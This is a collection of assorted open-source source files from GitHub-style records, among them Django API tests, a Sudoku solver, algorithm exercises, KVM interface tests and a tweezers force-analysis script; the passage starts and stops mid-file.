status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_not_admin_return_403(self, create_category, authenticate):\n authenticate(is_staff=False)\n\n response = create_category({})\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_if_data_is_invalid_return_400(self, create_category, authenticate):\n authenticate(is_staff=True)\n\n response = create_category({})\n\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n assert response.data['title'] is not None\n\n def test_if_data_is_valid_return_201(self, create_category, authenticate):\n authenticate(is_staff=True)\n file = create_picture()\n new_data = post_data.copy()\n new_data['picture'] = file\n\n response = create_category(data=new_data)\n file.close()\n print(response.data)\n\n assert response.status_code == status.HTTP_201_CREATED\n\n\n@pytest.mark.django_db\nclass TestUpdateCategory:\n def test_if_user_is_anonymous_patch_return_401(self, update_category):\n category_put = baker.make(Category)\n response = update_category({}, id=category_put.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_not_admin_patch_return_200(self, update_category, authenticate):\n authenticate(is_staff=True)\n category_put = baker.make(Category)\n\n response = update_category({'title': 'a'}, id=category_put.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_200_OK\n\n def test_if_user_is_not_admin_patch_return_403(self, update_category, authenticate):\n authenticate(is_staff=False)\n category_put = baker.make(Category)\n\n response = update_category({'title': 'a'}, id=category_put.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_if_data_is_invalid_category_return_400(self, update_category, authenticate):\n authenticate(is_staff=True)\n category_put = baker.make(Category)\n\n response = update_category({'picture':124},id=category_put.id)\n\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n\n def test_if_user_is_not_admin_patch_return_404(self, update_category, authenticate):\n authenticate(is_staff=True)\n category_put = baker.make(Category)\n\n response = update_category({'title': 'a'}, id=category_put.id + 100)\n print(response.data)\n\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n\n@pytest.mark.django_db\nclass TestDeleteCategory:\n def test_if_user_is_anonymous_delete_category_return_401(self, delete_category):\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id)\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_word_return_403(self, delete_category, authenticate):\n authenticate(is_staff=False)\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id)\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_if_user_is_delete_word_return_204(self, delete_category, authenticate):\n authenticate(is_staff=True)\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_204_NO_CONTENT\n\n def test_if_user_is_not_admin_delete_return_404(self, delete_category, authenticate):\n authenticate(is_staff=True)\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id + 100)\n print(response.data)\n\n assert response.status_code == status.HTTP_404_NOT_FOUND\n","repo_name":"matin138213/eshareh_api","sub_path":"word/tests/test_category.py","file_name":"test_category.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"20342309021","text":"# coding:utf-8\n\"\"\"\n @auth wangzhixiang\n @time 2019/3/15 12:02\n\"\"\"\ndef get_interface_method_by_desc(dvm, implement_interface, method_and_descriptor_list):\n\tdict_result = {}\n\tfor cls in dvm.get_classes():\n\t\tif is_class_implements_interface(cls, implement_interface) is True:\n\t\t\tclass_name = cls.get_name()\n\t\t\tif class_name not in dict_result:\n\t\t\t\tdict_result[class_name] = []\n\t\t\tfor method in cls.get_methods():\n\t\t\t\tmethod_and_desc = method.get_name() + method.get_descriptor()\n\t\t\t\tif method_and_desc in method_and_descriptor_list:\n\t\t\t\t\tdict_result[class_name].append(method)\n\treturn dict_result\n\ndef is_class_implements_interface(cls, implement_interface):\n\tclass_interface = cls.get_interfaces()\n\tif class_interface is None:\n\t\treturn False\n\tfor imp in implement_interface:\n\t\tif imp not in class_interface:\n\t\t\treturn False\n\treturn True\n\n\ndef check_have_override(class_and_methods_dict):\n\tnot_override_list = []\n\tfor class_name, methods in class_and_methods_dict.items():\n\t\tfor method in methods:\n\t\t\tins_count = 0\n\t\t\tfor ins in method.get_instructions():\n\t\t\t\tins_count = ins_count + 1\n\t\t\tif ins_count < 4:\n\t\t\t\tnot_override_list.append(class_name+ method.get_name() + method.get_descriptor())\n\treturn not_override_list\n\nif __name__ == '__main__':\n\tpass","repo_name":"MagiCiAn1/WoodPecker","sub_path":"StaticAnalyzer/views/android/analyzer_helper.py","file_name":"analyzer_helper.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"40692656599","text":"#\r\n# Skeleton file for the Python \"Bob\" exercise.\r\n#\r\ndef hey(what):\r\n Answer = ''\r\n if what == what.upper() and any(s.isalpha() for s in what):\r\n Answer = 'Whoa, chill out!'\r\n elif what.strip().endswith('?'):\r\n Answer = \"Sure.\"\r\n elif what.isspace() or what == '':\r\n Answer = \"Fine. Be that way!\"\r\n else:\r\n Answer = \"Whatever.\"\r\n return Answer\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/039c5c8a0d204fd5b5c2fec3bb3a874b.py","file_name":"039c5c8a0d204fd5b5c2fec3bb3a874b.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"42721895757","text":"import re\nfrom typing import Any, Iterable, List, Optional, Sequence\n\nfrom sqlalchemy import Row, Table, TextClause, text\nfrom starlette.requests import Request\n\n\ndef parse_conditions_from_query_params(request: Request) -> list:\n query_params = request.query_params\n conditions = []\n op_map = {\n \"gte\": \">=\",\n \"lte\": \"<=\",\n \"gt\": \">\",\n \"lt\": \"<\",\n }\n for key, value in query_params.items():\n if key in (\"fields\", \"sort\"):\n continue\n match = re.match(r\"(.+)\\[(gte|lte|gt|lt)\\]\", key)\n if match:\n field, op = match.groups()\n op = op_map[op]\n else:\n field, op = key, \"=\"\n conditions.append(f\"{field} {op} {value}\")\n\n return conditions\n\n\ndef get_fields_from_query_params(request: Request, table: Table) -> List[str]:\n fields = request.query_params.get(\"fields\")\n if not fields: # return all fields\n return [field.__str__() for field in table.c.keys()]\n return fields.split(\",\")\n\n\ndef get_sort_fields_from_query_params(request: Request) -> List[str]:\n sort_by = request.query_params.get(\"sort\")\n if not sort_by:\n return []\n return sort_by.split(\",\")\n\n\ndef build_statement(\n table_name: str,\n fields: Iterable[str],\n conditions: Optional[List[str]],\n order_by: Optional[List[str]],\n) -> TextClause:\n statement = f\"SELECT {','.join(fields)} \" f\"FROM {table_name}\"\n if conditions:\n statement += f\" WHERE {' AND '.join(conditions)}\"\n\n if order_by:\n order_by = [s + \" DESC\" for s in order_by]\n statement += f\" ORDER BY {','.join(order_by)}\"\n\n statement += \";\"\n return text(statement)\n\n\ndef build_response_for_compensation(query: Sequence[Row[Any]], fields: List[str]):\n response = []\n for item in query:\n response.append(dict(zip(fields, item.t)))\n return response\n","repo_name":"Lopatk1n/CompensationCRUD","sub_path":"src/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25508381390","text":"import argparse\nimport csv\n\nfrom collections import Counter\nfrom copy import deepcopy\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Union\n\nNUMBERS = [str(number) for number in range(10)]\n\n\nclass SudokuTable:\n def __init__(self, file_name: str):\n self.rows = []\n self.columns = [[] for _ in range(9)]\n self.squares = [[] for _ in range(9)]\n\n # Initialize a dictionary for mapping coordinates to their respective\n # squares.\n self.coordinate_to_square = {}\n\n # Initialize a dictionary for storing the true numbers found in a square.\n self.square_to_numbers = {\n 0: [],\n 1: [],\n 2: [],\n 3: [],\n 4: [],\n 5: [],\n 6: [],\n 7: [],\n 8: [],\n }\n\n # Set up a dictionary mapping squares to all their coordinates.\n self.square_to_coordinates = deepcopy(self.square_to_numbers)\n\n # Initialize dictionaries for storing the true numbers found in rows and\n # columns. Deep copies of the dictionary above are used for convenience.\n self.row_to_numbers = deepcopy(self.square_to_numbers)\n self.column_to_numbers = deepcopy(self.square_to_numbers)\n\n # Read a Sudoku from a file.\n self._read_sudoku_from_file(file_name)\n\n def _read_sudoku_from_file(self, filename: str):\n with open(filename, \"r\") as sudoku_file:\n csv_reader = csv.reader(sudoku_file, delimiter=\",\")\n for row_number, row in enumerate(csv_reader):\n row = [int(entry) if entry in NUMBERS else entry for entry in row]\n self._fill_row(row, row_number)\n self._fill_columns(row)\n self._fill_squares(row, row_number)\n\n if len(self.rows) != 9 and not all([len(row) == 9 for row in self.rows]):\n raise Exception(\"The Sudoku table is invalid.\")\n\n def _fill_row(self, row: List[str], row_number: int):\n self.rows.append(row)\n for entry in row:\n if type(entry) == int:\n self.row_to_numbers[row_number].append(entry)\n\n def _fill_columns(self, row: List[List[str]]):\n for column_number, entry in enumerate(row):\n self.columns[column_number].append(entry)\n if type(entry) == int:\n self.column_to_numbers[column_number].append(entry)\n\n def _fill_squares(self, row: List[Union[str, int]], row_number: int):\n \"\"\"\n This method could be refactored.\n :param row:\n :param row_number:\n :return:\n \"\"\"\n if 0 <= row_number < 3:\n start = 0\n end = 3\n for square_num in range(3):\n self.squares[square_num].append(row[start:end])\n for index in range(start, end):\n self.coordinate_to_square[(row_number, index)] = square_num\n self.square_to_coordinates[square_num].append((row_number, index))\n if type(row[index]) == int:\n self.square_to_numbers[square_num].append(row[index])\n start = end\n end += 3\n elif 3 <= row_number < 6:\n start = 0\n end = 3\n for square_num in range(3, 6):\n self.squares[square_num].append(row[start:end])\n for index in range(start, end):\n self.coordinate_to_square[(row_number, index)] = square_num\n self.square_to_coordinates[square_num].append((row_number, index))\n if type(row[index]) == int:\n self.square_to_numbers[square_num].append(row[index])\n start = end\n end += 3\n else:\n start = 0\n end = 3\n for square_num in range(6, 9):\n self.squares[square_num].append(row[start:end])\n for index in range(start, end):\n self.coordinate_to_square[(row_number, index)] = square_num\n self.square_to_coordinates[square_num].append((row_number, index))\n if type(row[index]) == int:\n self.square_to_numbers[square_num].append(row[index])\n start = end\n end += 3\n\n def set_field(self, row: int, column: int, value: int):\n self.rows[row][column] = value\n self.columns[column][row] = value\n\n def get_field(self, row: int, column: int) -> int:\n return self.rows[row][column]\n\n def print_table(self):\n for row in self.rows:\n for entry in row:\n print(entry, end=\" \")\n print()\n\n\nclass SudokuSolver:\n def __init__(self, table: SudokuTable):\n self.table = table\n\n self.possible = {}\n self._initialise_possible()\n\n def _initialise_possible(self):\n for row, column in self.table.coordinate_to_square:\n if isinstance(self.table.rows[row][column], str):\n self.possible[(row, column)] = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n else:\n self.possible[(row, column)] = self.table.rows[row][column]\n\n def solve(self):\n iter_count = 0\n while (\n any([type(possible) != int for possible in self.possible.values()])\n and iter_count < 9\n ):\n # Use easy_solve until self.possible is not changed by it anymore.\n possible_copy = None\n while possible_copy != self.possible:\n possible_copy = self.possible\n self.easy_solve()\n\n possible_copy = None\n while possible_copy != self.possible:\n possible_copy = self.possible\n self.check_two_item_coordinate_per_square()\n\n possible_copy = None\n while possible_copy != self.possible:\n possible_copy = self.possible\n self.check_single_elements_in_column()\n self.check_single_elements_in_row()\n\n iter_count += 1\n\n self.check_table_validity()\n\n if any([type(possible) != int for index, possible in self.possible.items()]):\n self.print_resulting_table()\n print(\"This Sudoku cannot be solved by this program.\")\n else:\n self.print_resulting_table()\n\n def easy_solve(self):\n \"\"\"\n Check the output of the easy sudoku to see whether this really works.\n :return:\n \"\"\"\n for row_number in range(len(self.table.rows)):\n for column_number in range(len(self.table.columns)):\n coordinate = (row_number, column_number)\n if type(self.possible[coordinate]) == list:\n self.check_row_easy_solve(coordinate)\n if type(self.possible[coordinate]) == list:\n self.check_column_easy_solve(coordinate)\n if type(self.possible[coordinate]) == list:\n self.check_square_easy_solve(coordinate)\n\n def check_row_easy_solve(self, coordinate: Tuple[int, int]):\n for true_number in self.table.row_to_numbers[coordinate[0]]:\n if true_number in self.possible[coordinate]:\n self.possible[coordinate].remove(true_number)\n\n if len(self.possible[coordinate]) == 1:\n new_true = self.possible[coordinate][0]\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n if new_true not in self.table.row_to_numbers[coordinate[0]]:\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1], new_true)\n\n def check_column_easy_solve(self, coordinate: Tuple[int, int]):\n for true_number in self.table.column_to_numbers[coordinate[1]]:\n if true_number in self.possible[coordinate]:\n self.possible[coordinate].remove(true_number)\n\n if len(self.possible[coordinate]) == 1:\n new_true = self.possible[coordinate][0]\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n if new_true not in self.table.column_to_numbers[coordinate[1]]:\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1], new_true)\n\n def check_square_easy_solve(self, coordinate: Tuple[int, int]):\n relevant_square = self.table.coordinate_to_square[coordinate]\n\n for true_number in self.table.square_to_numbers[relevant_square]:\n if true_number in self.possible[coordinate]:\n self.possible[coordinate].remove(true_number)\n\n if len(self.possible[coordinate]) == 1:\n new_true = self.possible[coordinate][0]\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n\n if (\n new_true\n not in self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ]\n ):\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1], new_true)\n\n def check_two_item_coordinate_per_square(self):\n \"\"\"\n Seemed to work at first sight but check again!\n :return:\n \"\"\"\n # Iterate over all 9 squares.\n for square, coordinates in self.table.square_to_coordinates.items():\n # Make a list of all values with 2 possible numbers.\n two_numbers = [\n tuple(self.possible[coordinate])\n for coordinate in coordinates\n if isinstance(self.possible[coordinate], list)\n and len(self.possible[coordinate]) == 2\n ]\n # Set up a set with equal values from the list with 2 possible numbers.\n entry_counter = Counter(two_numbers)\n equal_entries = set(\n [entry for entry in two_numbers if entry_counter[entry] > 1]\n )\n\n # Don't bother getting into the for loop if no equal entries of\n # length 2 exist.\n if equal_entries:\n for coordinate in coordinates:\n for equal_entry in equal_entries:\n for number in equal_entry:\n if (\n isinstance(self.possible[coordinate], list)\n and list(equal_entry) != self.possible[coordinate]\n and number in self.possible[coordinate]\n ):\n self.possible[coordinate].remove(number)\n\n if (\n isinstance(self.possible[coordinate], list)\n and len(self.possible[coordinate]) == 1\n ):\n new_true = self.possible[coordinate][0]\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n\n if (\n new_true\n not in self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ]\n ):\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1],\n new_true)\n\n def check_single_elements_in_column(self):\n \"\"\"\n Checks for numbers that are only possible in one cell of a column and\n sets this cell to this number.\n \"\"\"\n possible_columns = []\n for column in range(len(self.table.columns)):\n possible_columns.append([])\n for row in range(len(self.table.rows)):\n values = self.possible[(row, column)]\n possible_columns[column].append(values if isinstance(values, list) else [values])\n\n for column, poss_col in enumerate(possible_columns):\n for row, possible in enumerate(poss_col):\n for number in possible:\n if not any([number in poss for count, poss in enumerate(poss_col) if count != row]):\n self.table.row_to_numbers[row].append(number)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[(row, column)]\n ].append(number)\n\n if number not in self.table.column_to_numbers[column]:\n self.table.column_to_numbers[column].append(number)\n\n self.possible[(row, column)] = number\n self.table.set_field(row, column, number)\n\n def check_single_elements_in_row(self):\n \"\"\"\n Checks for numbers that are only possible in one cell of a row and\n sets this cell to this number.\n \"\"\"\n possible_rows = []\n for row in range(len(self.table.rows)):\n possible_rows.append([])\n for col in range(len(self.table.columns)):\n values = self.possible[(row, col)]\n possible_rows[row].append(values if isinstance(values, list) else [values])\n\n for row, poss_row in enumerate(possible_rows):\n for col, possible in enumerate(poss_row):\n for number in possible:\n if not any([number in poss for count, poss in enumerate(poss_row) if count != col]):\n self.table.column_to_numbers[col].append(number)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[(row, col)]\n ].append(number)\n\n if number not in self.table.column_to_numbers[col]:\n self.table.row_to_numbers[row].append(number)\n\n self.possible[(row, col)] = number\n self.table.set_field(row, col, number)\n\n def check_table_validity(self):\n \"\"\"\n Checks whether a resulting table is a valid Sudoku table.\n :return:\n \"\"\"\n for row in self.table.rows:\n if len(row) != 9 or set(row) != {1,2,3,4,5,6,7,8,9}:\n print(row)\n raise Exception(\"The sudoku table is not valid. Improve your \"\n \"algorithm. Check rows of table.\")\n for col in self.table.columns:\n if len(col) != 9 or set(col) != {1,2,3,4,5,6,7,8,9}:\n print(col)\n raise Exception(\"The sudoku table is not valid. Improve your \"\n \"algorithm. Check columns of table.\")\n\n count_results = Counter(self.possible.values())\n for count in list(count_results.values()):\n if count != 9:\n raise Exception(\"The sudoku table is not valid. Improve your \"\n \"algorithm. Check possible dictionary.\")\n\n def print_resulting_table(self):\n line_count = 0\n square_count = 0\n for coord, value in self.possible.items():\n print(\"{}\".format(str(value)), end=\" \")\n line_count += 1\n square_count += 1\n if square_count > 2:\n print(\" \", end=\"\")\n square_count = 0\n if line_count > 8:\n print()\n line_count = 0\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"sudoku_file\", nargs=\"+\")\n\n args = parser.parse_args()\n\n for sudoku_file in args.sudoku_file:\n table = SudokuTable(sudoku_file)\n\n print(sudoku_file)\n print()\n table.print_table()\n print()\n\n solver = SudokuSolver(table)\n\n solver.solve()\n print()\n","repo_name":"janniss91/SudokuSolver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":16688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72660768536","text":"import pygame\nimport random\nimport math\nfrom mine import Mine\n\n\nclass Worker:\n def __init__(self, building, color = (1,1,123)):\n self.color = color\n self.SPEED = 1000\n self.current = building\n self.destination = building\n self.dif_x = 0\n self.dif_y = 0\n self.pos = building.pos.copy()\n\n self.notification = False\n\n self.img = pygame.image.load('assets\\worker_red.png').convert()\n self.mineral = None\n\n\n def next(self):\n self.current = self.destination\n \n try:\n self.destination = random.choice(self.current.cons)\n except IndexError:\n if(not self.notification):\n print(\"Add another node\")\n self.notification = True\n\n self.dif_x = self.destination.pos[0]-self.pos[0]\n self.dif_y = self.destination.pos[1]-self.pos[1]\n \n def goto(self, building):\n self.destination = building\n self.pos = self.destination.pos.copy()\n self.next()\n\n def walk(self):\n \n if (math.dist(self.pos, self.destination.pos)<10):\n self.next()\n\n self.pos[0] += self.dif_x/self.SPEED\n self.pos[1] += self.dif_y/self.SPEED\n\n \n def draw(self, win, zoom, win_x, win_y):\n win.blit( #img\n pygame.transform.scale(self.img, (int(16*zoom),int(16*zoom))),\n (#pos\n (self.pos[0]-win_x)*zoom-8*zoom, \n (self.pos[1]-win_y)*zoom-8*zoom\n )\n )\n\n","repo_name":"Lennart4711/CaMS","sub_path":"src/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72986299737","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def flatten(self, root: TreeNode) -> None:\n if not root: return\n\n self.flatten(root.left)\n self.flatten(root.right)\n\n # 后序遍历位置\n # 1、左右子树已经被拉平成一条链表\n left = root.left\n right = root.right\n # 2、将左子树作为右子树\n root.left = None\n root.right = left\n # 3、将原先的右子树接到当前右子树的末端\n p = root\n # 依次寻找到右子树的末端\n while p.right is not None: p = p.right\n # 连接\n p.right = right\n\n","repo_name":"JackeyGuo/Algorithms","sub_path":"Leetcode/二叉树/114-二叉树展开为链表-m.py","file_name":"114-二叉树展开为链表-m.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"30992874494","text":"'''A lista de temperaturas de Mons, na Bélgica, foi armazenada na lista T =\n[-10,-9,0,1,2,5,-2,-4]. Faça um programa que imprima a menor e a maior temperatura, assim\ncomo a temperatura média, usando funções.'''\n\ndef menor(lista):\n if len(lista) != 0:\n menor = 0\n for i in range(0, len(lista)):\n if lista[i] <= menor:\n menor = lista[i]\n return menor\n\ndef maior(lista):\n if len(lista) != 0:\n maior = lista[0]\n for i in range(0, len(lista)):\n if lista[i] >= maior:\n maior = lista[i]\n return maior\n\ndef media(lista):\n if len(lista) != 0:\n soma = 0\n for i in range(0, len(lista)):\n soma += lista[i]\n media = soma / len(lista)\n return media\n \nlista = [-10,-9,0,1,2,5,-2,-4]\nmaior(lista)\nmenor(lista)\nmedia(lista)\nif len(lista) != 0:\n if maior(lista) == menor(lista):\n print(f\"a maior {maior(lista)} e menor {menor(lista)} temperatura são iguais, e a media de temperatura foi {media(lista)}°C\")\n else:\n print(f\"A menor temperatura é {menor(lista)}°C e a maior é {maior(lista)}°C, e a media de temperatura foi {media(lista)}°C\")\nelse:\n print(\"lista zerada\")\n","repo_name":"Gabriel-Angelo-Silva/Lista-de-Exercicios","sub_path":"atividade5.py","file_name":"atividade5.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24055294497","text":"from tessia.baselib.hypervisors.kvm.iface import Iface\nfrom tessia.baselib.hypervisors.kvm.target_device_manager \\\n import TargetDeviceManager\nfrom unittest import mock\nfrom unittest import TestCase\n\n#\n# CONSTANTS AND DEFINITIONS\n#\nIFACE_PARAMS = {\n \"attributes\": {\n \"libvirt\": \"some xml\"\n }\n}\n\n#\n# CODE\n#\nclass TestIface(TestCase):\n \"\"\"\n Class for testing of Ifaces.\n \"\"\"\n def setUp(self):\n \"\"\"\n Setup and create mock objects used in the tests.\n \"\"\"\n self._mock_tgt_dv_mngr = mock.Mock(spec=TargetDeviceManager)\n # setUp()\n\n def _create_iface(self, parameters):\n \"\"\"\n Auxiliary method to create a iface.\n \"\"\"\n return Iface(parameters, self._mock_tgt_dv_mngr)\n # _create_iface()\n\n def test_init_invalid_type(self):\n \"\"\"\n Test the case where an invalid interface type is specified.\n \"\"\"\n iface_params = {\n 'attributes': {'hostiface': 'eth0'},\n 'mac_address': 'aa:bb:cc:dd:ee:ff',\n 'type': 'invalid',\n }\n with self.assertRaises(ValueError):\n self._create_iface(iface_params)\n # test_init_invalid_type()\n\n def test_to_xml(self):\n \"\"\"\n Test iface creation with a xml provided as parameter.\n \"\"\"\n iface = self._create_iface(IFACE_PARAMS)\n\n # validate proper initialization\n self.assertIs(iface._libvirt_xml,\n IFACE_PARAMS.get(\"attributes\").get(\"libvirt\"))\n self.assertIs(iface._parameters, IFACE_PARAMS)\n self._mock_tgt_dv_mngr.update_devno_blacklist.assert_called_with(\n IFACE_PARAMS.get(\"attributes\").get(\"libvirt\"))\n\n # validate the xml provided was used\n iface = self._create_iface(IFACE_PARAMS)\n self.assertIs(iface.to_xml(),\n IFACE_PARAMS.get(\"attributes\").get(\"libvirt\"))\n # test_to_xml()\n\n @mock.patch(\"tessia.baselib.hypervisors.kvm.iface.open\",\n create=True)\n def test_to_xml_read_template(self, mock_open):\n \"\"\"\n Test the case that the libvirt xml is not provided and must\n be generated.\n \"\"\"\n template_file = mock_open().__enter__.return_value.read.return_value\n iface_params = {\n 'attributes': {'hostiface': 'eth0'},\n 'mac_address': 'aa:bb:cc:dd:ee:ff',\n 'type': 'MACVTAP',\n }\n iface = self._create_iface(iface_params)\n\n self.assertIs(\n iface.to_xml(),\n template_file.format.return_value)\n\n template_file.format.assert_called_with(\n mac=iface_params['mac_address'],\n devno=self._mock_tgt_dv_mngr.get_valid_devno.return_value,\n hostiface=iface_params['attributes']['hostiface'])\n # test_to_xml_reading_template()\n# TestIface\n","repo_name":"tessia-project/tessia-baselib","sub_path":"tests/unit/hypervisors/kvm/iface.py","file_name":"iface.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"6507079500","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 12 16:14:25 2019\r\nby Jeffrey Mc Hugh\r\nmchughj3@tcd.ie\r\n\r\n@author: jm2080\r\n\"\"\"\r\n\r\nimport os\r\nimport glob\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport file_dialog2 as fd\r\nimport TDMSfns2 as tdm\r\n\r\nplt.close('all')\r\n\r\nindir = fd.filedlg(\"C:/\", \"Choose folder of tdms files\")\r\npath = glob.glob(indir + '/' + '*_video_tweezers_*.tdms')\r\ninsavepath = fd.filedlg(\"C:/\", \"Choose save location\")\r\nsavepath = insavepath + '/'\r\n\r\nSSFkeyvals = []\r\nPkFvals = []\r\nd = []\r\n\r\ni = len(path)\r\nn = 0\r\n\r\nwhile n < i:\r\n\r\n plt.close('all')\r\n \r\n name = os.path.basename(path[n])\r\n s1 = name.split('_')[0]\r\n s2 = name.split('_')[3].split('.')[0]\r\n \r\n tdms_file = path[n]\r\n dataPt = tdm.tdmsLoad(tdms_file, 'Position Data', 'Time')\r\n #converts the contents from lists to numpy arrays\r\n if np.amin(dataPt) < 1.0e-02: \r\n dataPt[np.argmin(dataPt):np.size(dataPt)] += dataPt[np.argmin(dataPt)-1]\r\n #zero each time channel\r\n tmin = np.amin(dataPt)\r\n relt = dataPt - tmin\r\n delt = relt[1] - relt[0]\r\n \r\n dataPx = tdm.tdmsLoad(tdms_file, 'Position Data', 'x-pos')\r\n #convert pixels to nm, 1 pixel = 214.56 nm\r\n dataPxnm = dataPx * 214.56\r\n #convert to force knowing laser power and using calibration curve\r\n Fx = dataPxnm * 0.08\r\n Fx = np.ma.array(Fx, mask=np.isnan(Fx))\r\n Fmax = np.amax(Fx)\r\n relFx = Fx - Fx[0]\r\n \r\n dataPy = tdm.tdmsLoad(tdms_file, 'Position Data', 'y-pos')\r\n dataPynm = dataPy * 214.56\r\n Fy = dataPynm * 0.08\r\n Fy = np.ma.array(Fy, mask=np.isnan(Fy))\r\n Fymax = np.amax(Fy)\r\n relFy = Fy - Fy[0]\r\n \r\n puldat = tdms_file\r\n pulname = puldat.split('/')[-1]\r\n pultime = pulname.split('_')[3].split('.')[0]\r\n puldate = pulname.split('_')[0]\r\n pulfldr = puldat.split('/')[-2]\r\n \r\n #These are the \"Tableau 20\" colors as RGB. \r\n tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120), \r\n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150), \r\n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148), \r\n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199), \r\n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)] \r\n \r\n #Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts. \r\n for z in range(len(tableau20)): \r\n r, g, b = tableau20[z] \r\n tableau20[z] = (r / 255., g / 255., b / 255.)\r\n \r\n relt = relt.reshape(relt.size, 1)\r\n relFx = relFx.reshape(relFx.size, 1)\r\n relFy = relFy.reshape(relFy.size, 1)\r\n relF = np.sqrt(np.square(relFx) + np.square(relFy))\r\n relF = relF.reshape(relF.size, 1)\r\n farr = np.concatenate((relt, relFx, relFy, relF),axis=1)\r\n ssrelF = np.mean(relF[-20000:-10000], axis=0)\r\n relFmax = np.amax(relF)\r\n stedstr = \"Steady State Force = \" + str(np.round(ssrelF, 3))[1:-1] + '\\n' + \"Peak Force = \" + str(np.round(relFmax, 3))\r\n \r\n SSFkeyvals.append(ssrelF[0])\r\n PkFvals.append(relFmax)\r\n \r\n fignuj = plt.figure(figsize=(12.6, 9.72))\r\n axnuj = fignuj.add_subplot(111)\r\n axnuj.set_xlabel('Time (s)', fontname='Arial', fontsize=28)\r\n axnuj.set_ylabel('Force (pN)', fontname='Arial', fontsize=28)\r\n axnuj.plot(relt, relF, color=tableau20[6], linewidth=2.0, label=stedstr)\r\n axnuj.legend(loc='best', fancybox=True, fontsize=12, framealpha=0.5)\r\n axnuj.locator_params(nbins=6)\r\n axnuj.tick_params(direction='in', length=7, width=2)\r\n axnuj.xaxis.set_ticks_position('both')\r\n axnuj.yaxis.set_ticks_position('both')\r\n for tick in axnuj.get_xticklabels():\r\n tick.set_fontname('Arial')\r\n for tick in axnuj.get_xticklabels():\r\n tick.set_fontsize(28)\r\n for tick in axnuj.get_yticklabels():\r\n tick.set_fontname('Arial')\r\n for tick in axnuj.get_yticklabels():\r\n tick.set_fontsize(28)\r\n for axis in ['top','bottom','left','right']:\r\n axnuj.spines[axis].set_linewidth(2)\r\n 